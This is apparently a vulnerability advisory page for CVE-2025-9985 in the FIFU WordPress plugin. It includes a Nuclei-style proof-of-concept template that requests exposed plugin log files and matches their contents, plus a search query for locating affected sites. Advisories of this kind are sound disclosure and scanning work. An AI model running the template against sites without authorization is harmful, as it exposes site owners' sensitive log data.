CVE-2025-9985: Featured Image from URL (FIFU) <= 5.2.7 - Unauthenticated Information Exposure via Log File

2025-11-07 Featured Image from URL (FIFU) PoC Public

Description

The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.2.7 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files.

PoC

id: CVE-2025-9985

info:
  name: Featured Image from URL (FIFU) <= 5.2.7 - Unauthenticated Information Exposure via Log File
  author: zer0p0int
  severity: medium
  description: |
    The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.2.7 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files.
  impact: |
    Unauthenticated attackers can view sensitive information from exposed log files, potentially leading to information disclosure.
  remediation: |
    Update to the latest version of the Featured Image from URL (FIFU) plugin.
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/featured-image-from-url/"
  tags: cve,cve2025,wordpress,wp,wp-plugin,unauth,vuln,featured-image-from-url,log,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/fifu-plugin.log"
      - "{{BaseURL}}/wp-content/uploads/fifu-cloud.log"

    redirects: true
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"fifu-dimensions":'
          - '"Invalid size:'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ef81f9d253c87043d3d07ed07ac09fbca05db7b5a70a39ae8d9634d2a7a26c510221008d84584d7a0dc981bbe88a4c33cc7b9131ecaccc2f1e12f42b2fe389746a3b0f:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities